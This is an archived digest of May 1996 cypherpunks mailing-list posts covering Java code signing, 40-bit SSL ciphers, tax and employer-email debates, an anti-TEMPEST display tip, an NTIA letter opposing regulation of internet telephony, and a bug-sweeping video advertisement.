From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 13 May 1996 08:13:32 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: Notes from the SF Physical Cypherpunks meeting
In-Reply-To: <v02140b02adbbbc07c4f6@[17.128.201.139]>
Message-ID: <Pine.SOL.3.91.960512122402.18620A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


any more details about what was said about  java code-signing?

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 13 May 1996 07:27:11 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <9605121826.AB04463@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



> Thanks to Philip Zimmermann and Lance Cottrell the balance of power
> between the state and the little guy has changed completely. It's
> good to see that both of them are going into mass market business.
> Perhaps they can get some of the billions of dollars they deserve.

 Thumbs up!

JFA


 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 12 May 1996 16:59:29 +0800
To: jf_avon@citenet.net
Subject: Re: Again: [hrdware] anti-Tempest video settings
In-Reply-To: <9605120112.AA02225@cti02.citenet.net>
Message-ID: <199605120351.NAA01349@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> Or, to the contrary, is it reasonable to assume that modern Tempest equipment can
> work around theses impediments almost all of the time, therefore 
> making any attempts at this futile?
> 
> Regards

Make a grey-scale cable by merging the RGB lines (AND the RGB return lines).
Do not use a standard grey scale cable, these are typically intensity on
green, which you do not want.

Connect the cable and start playing with your colour scheme. The effect you
want to achieve is one where all colours have the same intensity. When that
happens your whole screen should be the a uniform grey area. Revert to the
regular cable and save your palette configuration.

I imagine this would be effective against all of the middle range
van-eck monitoring equipment. It will not be effective against equipment
that looks for phase distortion and signatures in an attempt to
discriminate against the three signals.  Equipment capable of the latter
would be extremely complicated and expensive to design and produce; I
suspect there has been no call for it to date, given that if you are
dealing with a target who understands the risks of van-eck they usually
have shielding and or a faraday cage.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 13 May 1996 11:53:46 +0800
To: cypherpunks@toad.com
Subject: KWTX (fwd)
Message-ID: <199605122100.OAA11829@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Subject: KWTX

 
 Vincent Miller / April 25, 1996
 International Society for Individual Liberty (ISIL)
 Update Letter

 --------------------excerpt------------------------------------

 The Onslaught Against American Liberties Escalates

 The US Justice Department is currently suing radio station KWTX in
 Texas over what they term "malicious disregard for the truth  in
 reporting on Waco".  If convicted the station will be both civilly
 and criminally liable for any alleged harm caused to property or
 government agents.

 This is of course ironic.  In a sea of federal propaganda, and
 self-serving FBI-ATF press releases, the small radio and TV stations
 (and the Internet) were the Only source of real information about
 what actually happened at Waco.

 Even before this case has been heard the judge revealed his bias by
 stating that he thought the conduct of the station was "outrageous."

 Source: CBS Evening News with Dan Rather (Apr 19th).

 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

 ISIL, 1800 Market Street, San Francisco, CA 94102
 415-864-0952, fax 415-864-7506

 This organization gives permission to reprint provided that proper
 credit is given.

 --------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Sun, 12 May 1996 22:47:09 +0800
To: cypherpunks@toad.com
Subject: Reply to anonymous ping.
Message-ID: <9605121128.AA11689@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Your code name is: an611909@anon.penet.fi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 13 May 1996 12:58:09 +0800
To: cypherpunks@toad.com
Subject: Re: Notes from the SF Physical Cypherpunks meeting
Message-ID: <31966CD7.794B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org wrote:
>
> > c2.org: 90% of all connections are 40-bit RC2.
>
>         The number is 94.5%, and it's RC4, not RC2. RC2 is not in any
> SSLv2 products.

The domestic version of Netscape has always done RC2.  The export version
of Netscape 3.0 now does 40-bit RC2 in SSL v2 mode.

-- 
One tag to rule them all, One tag to find them; One tag | Tom Weinstein
to bring them all, and in the source tree bind them.    | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 13 May 1996 09:41:52 +0800
To: Mixmaster <mixmaster@remail.obscura.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605121210.FAA14392@sirius.infonex.com>
Message-ID: <Pine.SV4.3.91.960512162832.10906C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 May 1996, Mixmaster wrote:

> Just go to your boss and tell him that you have an offer from a
> consulting company. You'd be happy to continue working for him
> until he finds a replacement (which could take decades) for 90%
> of your old pre-tax salary. You should get a big smile in return.

    THe IRS is very aggressive about making sure that employment taxes are
paid. If your boss has the right to tell you _how_ to do your work, he is
your boss, not your consulting client. It doesn't matter, whether your
boss choses to exercise his supervisory powers or not. If he has the
_right_ to do so - you are an employee. This has been wrung out in the
courts many times. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah Harmsen <jeremiah@Aldus.NorthNet.org>
Date: Mon, 13 May 1996 10:25:02 +0800
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BB4025.07A45B40@ppp-18.saranac.northnet.org>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 13 May 1996 16:00:17 +0800
To: cypherpunks@toad.com
Subject: Civil liberties of employees (Re: FYB_oss)
Message-ID: <adbbd23b000210049f3d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 PM 5/12/96, John Young wrote:
>   5-12-96. NYPaper:
>
>   "Who's Reading Your E-Mail? Maybe the Boss. More Companies
>   Say Messages Are Their Property."
>
>   Reports on various spying policies and employee rights.
>   Quotes PRZ demurring: "You don't check your constitutional
>   rights at the door." Notes Apple's snooping not.
>

Actually, one _does_ check one's Constitutional rights "at the door" (of an
employer), and the confusion over this issue is pervasively destroying real
Constitutional rights.

For instance, if I hire someone, I can require him or her to wear a
uniform, to not wear blue jeans to work, to not smoke (or even to smoke, if
this is what the job involves), to take off his or her clothes, to tap
dance, to not say anything to my customers, and on and on. If the
government required these behaviors, this would be a legitimate issue, but
not if employers set these conditions as terms of continued employment.

If an employer says that all messages will be read by him, this is not a
violation of anyone's "civil liberties." (And, on a practical note,
companies are often held responsible for the messages emanating on company
time from employees, so there are actual reasons why such monitoring may be
necessary.)

An employee who dislikes the terms of his employment is of course free, in
our society, to leave.

The Constitution is about what the government can and cannot require, not
about what I as an employer can require. This point is frequently confusing
to people who, in my opinion, haven't thought about it. Thus, a "Hooters
girl" suddenly decides she doesn't like "displaying herself" to men and
announces that her civil liberties are being violated by being told to wear
skimpy outfits.

(I haven't read Zimmermann's comments in full, to get the full context, but
I doubt we'll agree on such things. His achievement with PGP was
considerable, but I know from first-hand experience that his political
views are very non-libertarian and are, in fact, counter to liberty.)

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 13 May 1996 17:15:32 +0800
To: cypherpunks@toad.com
Subject: Re: Notes from the SF Physical Cypherpunks meeting
Message-ID: <adbbd556010210045a3b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'd like to thank Martin Minow for his summary of what happened at
yesterday's Bay Area Cypherpunks meeting (note that it was Bay Area, held
at Stanford, not "SF").

Clarifications and corrections are starting to come in, which is fine. But
these clarifications and corrections should not dissuade Martin or anyone
else from doing such summaries.

This meeting was somwhat languid, I think because of the outdoor (and
warm!) location at Tresidder Union at Stanford University...normally our
meetings have been held in the cool corporate environs of Cygnus, Silicon
Graphics, or Sun, but Stanford is the likely meeting place for upcoming
gatherings. (For one thing, an outdoor gathering at Stanford makes it
unnecessary for a corporate type to be there. We are also too big a
group--about 20-40, typically--to meet in a coffee shop or pizza joint.)

For whatever reason, only a handful of such summaries have ever been done
in the three and a half years our group and other groups have been having
physical meetings. (I did a couple, but not for the past couple of years.)

Anyway, well done!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 13 May 1996 11:43:16 +0800
To: cypherpunks@toad.com
Subject: Cybercash snake oil merchant
Message-ID: <01I4MLT1GBSG8Y5CN9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've located a new snake oil merchant, by the name of cybank. Their
url is http://www.cybank.net, and they're claiming things like "public key
encryption has been broken." Well, yes... if you use a too-short key length.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 13 May 1996 19:17:04 +0800
To: cypherpunks@toad.com
Subject: Why does the state still stand:
Message-ID: <199605130214.TAA23835@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


I intend to post this to a bunch of rant newsgroups.  It is the common
wisdom of cypherpunks:  Any corrections or objections?

   *************************************************************************

Why does the state still stand?

At 07:26 AM 5/5/96 -0400, Duncan Frissell wrote:
> Even though the population of those who regularly violate 
> federal tax laws is smaller (20 million?) the records show 
> that even for this population the odds of being convicted are
> approximately the odds of being murdered.
>
> http://www.trac.syr.edu/tracirs/analysis/IRS019page.html 

Now if the state had to compel everyone to write a check for ten thousand
dollars every quarter, or to make little trip to the IRS with a brown paper
bag full of hundred dollar bills, there would be massive tax resistance,
massive state violence to enforce taxes, and the many individual violent
conflicts with the state would swiftly become collective armed revolution. 

The state can get away with this extraordinary and exorbitant tax rate,
because for the most part it does not apply coercion directly to individual
people.  Instead it disrupts the large scale institutions that we have
created to facilitate large scale cooperation.

Now it is easy to coerce the transactions in physical marketplace, or a
physical large scale factory or office, because the state can easily find
the market place and see what people are doing in it, far easier than it can
find individual people and see what each person is doing overall, and if
people do not play by the state's rules it can easily send in the bad boys
to close down the marketplace.

Thus the state obstructs the large scale specialization of labor, and
charges us a high price to participate in that specialization.

The state can do this effectively because such specialization depends on
large numbers of people regularly meeting face to face in recognizable
physical places: company offices, stock exchanges, and the like.   The state
can extract this tax because it can send the bad boys into any such meeting
place and close it down. 

It is this, rather than direct coercion of taxpayers that enables it to
charge such savage and extraordinary taxes.  Any attempt to directly coerce
taxpayers on this scale would swiftly lead to rivers of blood.

Electronic marketplaces are less easy to coerce.  Note how states find
themselves largely powerless before the international money market.  This
has caused a substantial retreat of the state in many countries throughout
the world. 

The socialists complain because the World bank asks the Ukraine and Belarus
to be slightly less socialist, but the international money market will not
touch such governments with a ten foot pole, while it will roll over like a
puppy for governments such as Estonia and Tunisia which really are
dismantling socialism.

The challenge then is to move the meetings that make specialization of labor
possible to the net, thus making us less easy for the state to coerce.

The anarcho socialists have one half of an important truth: In order to
smash the state, we must first transform capitalism. 

Right now not much is happening.

Ecash today is rather like email eight years ago.  You had a bunch of email
systems none of which would talk to each other and none of which were very
easy to use and all of which cost too much.

Most good groupware, for example source code control programs, is designed,
perhaps intentionally, in ways that make it only useful for intranets, not
for WANs.  That is to say only useful inside the kind of corporations that
presently exist.  Also, to be useful in a post corporate economy, a source
code control tool would need to have better view control, since the boss
cannot simply announce.  "OK, we are now in alpha, so we shall now have
feature freeze on the product."  Instead somebody has to announce "I have
constructed and will maintain a feature frozen buildable source code view."
We would be vastly further ahead on PGP 3.0 and on ecash if we had a tool
like that.

How then did we solve the email problem?

The email problem was not a problem that big corporations were capable of
solving.  Whenever one network, such as Compuserv, negotiated with another
network, such as AOL they could never agree about settlements. How much
would compuserv charge AOL to deliver AOL customers mail to Compuserv
customers, and how much would AOL charge Compuserve to deliver Compuserve
customers mail to AOL customers.  And how would it be metered, and what
software standards would be used to enable the metering, and the lawyers
would talk to the accountants, and the accountants to the software guys, and
up and down the corporate hierarchy it would go, and back and forth between
corporations.

Eventually, on the internet, the custom and expectation grew up that you did
not charge for delivering mail to your customers, largely due to the
influence, and the moral and political outlook, of the IETF.   

Problem solved:  Nothing to negotiate;  Nothing to be metered.  Turned out
it was a moral and political problem, not a pricing problem.

Now right now we are in the same pickle with electronic transactions as we
once were with email.  We have a bunch of proprietary systems with
proprietary software and proprietary money that do not talk to each other. 

Worse, anonymous ecash is patented by Chaum.  This is an algorithm for how
people  structure promises to pay, and is therefor even less well suited to
be intellectual property than most software patents. As a result anyone who
wants to make an agreement with Chaum to implement anonymous electronic cash
faces a lot of cost and delay.  Such agreements are difficult to make and
implement.

What we need in addition to our existing electronic cash mechanisms is a
general mechanism for exchanging and transferring promises to pay, so that
Betty can exchange a promise by John to pay in system X for a promise by Sam
to pay in system Y.  Such a system must make every man their own bank and
their own credit agency, and must not be tied to any one proprietary
institution that issues promises to pay.

Now once we have that, it will cobble all the different ecash systems
together, just as the internet cobbled all the email systems together, and
we will start to make some real progress in moving the institutions that
facilitate large scale specialization of labor to the net.  Right now
nothing much is happening, despite the fact that several big names have
issued ecash systems.

Now in order to create such a system we need a patent free public key
system: (Rabin will be free from the DH patent in one year) and we need a
satisfactory public key management system, one that can couple to standard
databases.  Lots of folk are twiddling their thumbs waiting for Phil
Zimmermann to issue the PGP 3.0 key management system.  Possibly someone
will issue a PGP key management system that works with the Microsoft Crypt
API.   The Microsoft default key management system is crummy, and is limited
to keys small enough for the NSA to break.

So guys, that is the plan:  We destroy the state through higher mathematics.
We do this by replacing the current institutional mechanisms of corporations
with cryptographic mechanisms.  This will give more people the opportunity
to evade and resist taxes.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 13 May 1996 19:34:31 +0800
To: "Jeff D. Mendelson" <74407.350@CompuServe.COM>
Subject: Accidental subscriber needs help off of list.
Message-ID: <199605130323.UAA15286@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm just another subscriber to the list; I can't see any indication that 
you've sent your message to the list itself.  I will forward this response 
to the list; somebody should see it and be able to help.


At 11:08 PM 5/12/96 EDT, Jeff D. Mendelson wrote:
>Dear Sir,
>
>My name is Jeff and I was accidently placed on your Cyberpunk mailing list.  I
>am currently being bombarded with e-mail from your list with information that I
>am not interested in.  Compuserve has not been able to help me get my name off
>of this list.  And since I am new at Internet e-mail, I am at a loss of what to
>do.
>
>Can you please send me exact instructions on removing my name from this mailing
>list?  Thank you very much for your time.  You don`t know how much I would
>appreciate it.
>
>Sincerely,
>
>Jeff M.
>74407.350@compuserve.com
>
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 13 May 1996 17:48:18 +0800
To: cypherpunks@toad.com
Subject: Re: Notes from the SF Physical Cypherpunks meeting
Message-ID: <199605130329.UAA28692@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I would also like to thank martin for his notes.  I was unable to attend
the meeting and the notes are the best I can do.  A small correction and
some pointers:

At  9:29 AM 5/12/96 -0700, Martin Minow wrote:
>KEYCOS Started in TimeShare, early 1970's. Ran customers (competitors)

The correct spellings are KeyKOS and Tymshare.  That may help people
searching for other information.

URLs for KeyKOS information are:

  http://www.cis.upenn.edu/~KeyKOS/
  http://www.agorics.com/agorics/allkey.html

Also, a system being built on similar ideas is described at:

  http://www.cis.upenn.edu/~eros


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 13 May 1996 18:26:23 +0800
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605121210.FAA14392@sirius.infonex.com>
Message-ID: <Pine.SUN.3.93.960512211031.9265A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 May 1996, Mixmaster wrote:

> if you spend $50k. Or do it yourself for $1k. Start by reading
> everything from Scope (www.britnet.co.uk/scope). The books you find
                  ^^^^^
> there cover everything you need to know in perfect detail.

Woops.  What dwindling credibility you had in my view is now gone.
Poof and -PLOINK-.

(I suggest cypherpunks so interested pursue other options).

> 
> X
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Mon, 13 May 1996 10:32:22 +0800
To: cypherpunks@toad.com
Subject: Re: Notes from the SF Physical Cypherpunks meeting
Message-ID: <2.2.32.19960512200212.00912c48@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 09:29 1996-05-12 -0700, Martin Minow wrote:
>COM e-mail/bbs system (Sweden) -- operator could backup
>e-mail, but not read it.

Sure. The database was encrypted by using XOR with the string
"KOM". That was the sorry state of encryption in the early eighties.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 13 May 1996 12:24:54 +0800
To: cypherpunks@toad.com
Subject: FYB_oss
Message-ID: <199605122203.WAA26085@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-12-96. NYPaper:

   "Who's Reading Your E-Mail? Maybe the Boss. More Companies
   Say Messages Are Their Property."

   Reports on various spying policies and employee rights.
   Quotes PRZ demurring: "You don't check your constitutional
   rights at the door." Notes Apple's snooping not.

   And, scare-escrowing, it asks, "what happens if an employee
   encrypts important company documents, and then dies [or is
   fired or extorts]. How will the company get to vital
   information."


   FYB_oss











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 13 May 1996 17:51:27 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: found nym-differentiation! Still need perpetual motion, FTL travel, cold fusion
In-Reply-To: <v02120d07adbb3f930991@[192.0.2.1]>
Message-ID: <199605130232.WAA10281@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> At 19:02 5/11/96, Perry E. Metzger wrote:
> 
> >I doubt that will work even were it implemented. Every phone on the
> >planet and terminal would need to constantly do biometric analysis of
> >every user, and even then people could program their terminals to lie.
> 
> Telling your terminal to lie will be rather difficult once the CPU refuses
> to run an OS with out propper signatures.

Oh, sure. How, exactly, could you do that? I can't think of a way to
build a CPU to do such a thing. What would it do? I mean, if it
checked a signature before booting, you could just halt the clock,
reach in to RAM, and alter the contents of the OS after boot. Its
both meaningless and impossible for it to check signatures on
individual instructions.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 13 May 1996 18:18:58 +0800
To: cypherpunks@toad.com
Subject: Administration letter vs ACTA petition
Message-ID: <01I4MWMC3JJK8Y5CQA@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 12-MAY-1996 23:22:09.31
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 8 May 1996 21:13:48 -0400
From: "Thomas A. Kalil" <KALIL_T@a1.eop.gov>
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: Administration opposes ACTA petition


       
                                   May 8, 1996


The Honorable Reed Hundt
Chairman
Federal Communication Commission
Room 814
1919 M Street, N.W.
Washington D.C. 20554

                                   Re: RM 8775

Dear Chairman Hundt:

     This letter addresses the petition for rulemaking filed before the
Commission by America's Carriers Telecommunication Association (ACTA) in
March 1996.  ACTA asks the Commission to:  (1) order Internet software
providers to "immediately stop their unauthorized provisioning of
telecommunications software"; 2)  confirm the Commission's authority over
interstate and international telecommunications services offered over the
Internet; and 3) institute rules to govern the use of the Internet for
providing telecommunications services.

     On behalf of the Administration, NTIA strongly urges the Commission
to deny the ACTA Petition.  The Petition not only mischaracterizes the
existing law, but also reflects a fundamental misunderstanding of the way
in which the Internet operates and of the services now making use of the
Internet.

     ACTA requests that the Commission stop firms such as the Respondents
from selling software that enables "a computer with Internet access to be
used as a long distance telephone, carrying voice transmissions, at
virtually no charge for the call" [ACTA Petition at i]. ACTA asserts that
such firms are common carrier providers of telecommunications services
that should not be allowed to operate without first obtaining a
certificate from the Commission [ACTA Petition at 6-7].

     That argument is wrong.  The Respondents provide their customers with
goods, not services.  Although the software that those firms sell does
enable individuals to originate voice communications, all of the actions
needed to initiate such communications are performed by the software
users, rather than the vendors.  At no time do the Respondents engage in
the "transmission" of information, which, according to the
Telecommunications Act of 1996, is the sine qua non of both a
telecommunications service and a telecommunications carrier. [See
Telecommunications Act of 1996, Pub. L. No. 104-104, 110 Stat.  56, 3(a)
amending Section 153 of the Communications Act of 1934 to add new
definitions of "telecommunications,"  "telecommunications service," and


"telecommunications carrier."] In that critical sense, the Respondents are
no more providing telecommunications services than are the vendors of the
telephone handsets, fax machines, and other customer premises equipment
that make communications possible.
     ACTA also asks the Commission for a declaratory ruling "confirming
its authority over interstate and international telecommunications
services using the Internet." [ACTA Petition at 6.  While ACTA claims the
Commission has jurisdiction to regulate the Internet pursuant to Section 1
of the Communications Act, citing United States v. Southwestern Cable Co.,
392 U.S. 157 (1968), ACTA also acknowledges that such jurisdiction is
limited to actions ancillary to the effective performance of its specific
responsibilities under other parts of the Act.  Id. at 5,7-8.  ACTA
suggests that unregulated growth of the Internet presents "unfair
competition" to Title II regulated interexchange carriers that "could, if
left unchecked, eventually create serious economic hardship on all
existing participants in the long distance marketplace" and could be
"detrimental to the health of the nation's telecommunications industry and
the maintenance of the nation's telecommunications infrastructure."  Id.
at 4, 5. Voice telephony via the Internet, however, is still a limited and
cumbersome capability:  both parties to the call need computers and must
have compatible software.  Moreover, there is no assurance that a call
placed will be completed or not interrupted.  While the technology
involved may improve rapidly, presently there is no credible evidence to
justify Commission regulation of the Internet.] In fact, as the Federal
Networking Council pointed out in comments filed on May 4, there are no
telecommunications services currently being offered via the Internet.  The
services that now involve the Internet are more likely to be "enhanced,"
or information services over which the Commission has disclaimed
jurisdiction under the Communications Act.  The Commission decision in the
1980's not to regulate enhanced services was a wise one that has conferred
substantial benefits on American consumers.  The Telecommunications Act of
1996 in no way requires a change in that decision.

     The Internet now connects more than 10 million computers, tens of
millions of users, and is growing at a rate of 10-15 percent a month.
This growth has created opportunities for entrepreneurs to develop new
services and applications such as videoconferencing, multicasting,
electronic payments, networked virtual reality, and intelligent agents.
Perhaps more importantly, it creates a growing number of opportunities for
consumers to identify new communication and information needs and to meet
those needs.  The Commission should not risk stifling the growth and use
of this vibrant technology in order to prevent some undemonstrated harm to
long distance service providers.  If Internet-based services eventually
develop to an extent that raises concerns about harm to consumers or the
public interest, the Commission would have ample time to more fully
address the issue.  Now is not that time.

     NTIA, therefore, urges the Commission to reject the ACTA petition
without delay.



                                   Larry Irving




                                   Assistant Secretary for
                                   Communications and Information

cc:  The Honorable James H. Quello
     The Honorable Rachelle B. Chong
     The Honorable Susan Ness







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SpyKing <6886@mne.net>
Date: Mon, 13 May 1996 18:15:56 +0800
To: (Recipient list suppressed)
Subject: R U Bugged How To Debugging Video
Message-ID: <9605130344.AA10252@mne.com>
MIME-Version: 1.0
Content-Type: text/plain


R-U Bugged? "How-To" De-Bugging Video

Are you a target of electronic surveillance? Do you suspect someone is
invading your privacy?

The first "Do-it-Yourself" De-Bugging video available to the general public... 
     
Over 100,000 bugs were planted in the US last year...Could you find one in
your home or office? 
     
This video will teach you how! Simple step-by-step instructions...Produced
by an expert with 25 years in the business... 
     
Guaranteed to help safeguard your privacy 
     
Demonstrations of sophisticated and inexpensive commercially available
bugging devices and how to find them... 
     
If you're serious about privacy, you can't afford to miss this video... 

Mention electronic eavesdropping, wiretaps or "bugging" and most people
think of the police or secret agents...Who, you might ask would want to bug
an office, a boardroom, a research lab or for that matter, someone's
bedroom? The answer: More people than you might ever imagine, according to
experts.

With the cost of eavesdropping electronics falling sharply each year, it has
become very easy for a jealous spouse, business competitor, or disgruntled
employee to eavesdrop on just about anyone. Experts estimate that last year,
over 100,000 bugs were planted in businesses alone! No one knows exactly how
many were planted by jealous lovers, spouses, or worse by stalkers, but it
should be at the very least an equal amount...Very few of these
eavesdropping targets ever knew they were being spied on.

Is there any way to know if one's home or business has been bugged? Yes. You
can bring in a professional "sweeper", TSCM Expert", "De-Bugger". With his
electronic equipment, he can find and deactivate those bugging devices. That
will cost you $500 to $1000. to start! The average home or business can cost
thousands of dollars...

But what if you've been bugged and you can't afford an expert? That's where
a brand new do-it yourself video comes into the picture. Titled "R-U-Bugged"
this video was produced for the non-technical person by an expert with over
25 years of international experience in electronic countermeasures. It fully
explains eavesdropping devices, how they work and how to find them... It
shows simple step by step "how to" basics that anyone can understand. 

If you think that bugging equipment is only found in the latest adventure of
007, you're mistaken...This video shows how common and inexpensive
equipment, readily available at almost any electronics store, can compromise
your privacy...

"R-U-Bugged" is available and in stock for $59.95 + $5.95 shipping &
handling. Foreign orders please add $14.95 S & H . Playing time: 90 minutes 

Send or Money Order to:

Codex Publishing
286 Spring Street
New York, NY 10013
Tel: 212-989-9898

Sorry, No C.O.D.'s or credit cards...

 
Check out our WEB SITE - The Codex Privacy Page
URL: http://www.thecodex.com

Home of The Codex Surveillance & Privacy Newsletter
DataScan - Diagnostic TEMPEST Evaluation System
Technical Surveillance CounterMeasures  (TSCM)
Forensic Audio Restoration & Audio Tape Enhancement  

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7.1

mQCNAzDgc7MAAAEEAK1gzGapvWKn287T8QPYphpIzF6+uHAyf/shVPbrGD/f5v8i
sgMOSC5x05w9xyijpzx2ua5i4eXXzjiq257y7oJy60TEFWRHYqGJtZRpqlh9DKjD
0EA5dVitmEgKNot3rmcF9amBxUP2RwIq2nzHfgiLGB3obqeKYp0MXw7qZrH7AAUR
tB5TcHlLaW5nIDxzcHlraW5nQG5vdmFsaW5rLmNvbT4==UBv6

-----END PGP PUBLIC KEY BLOCK----- 





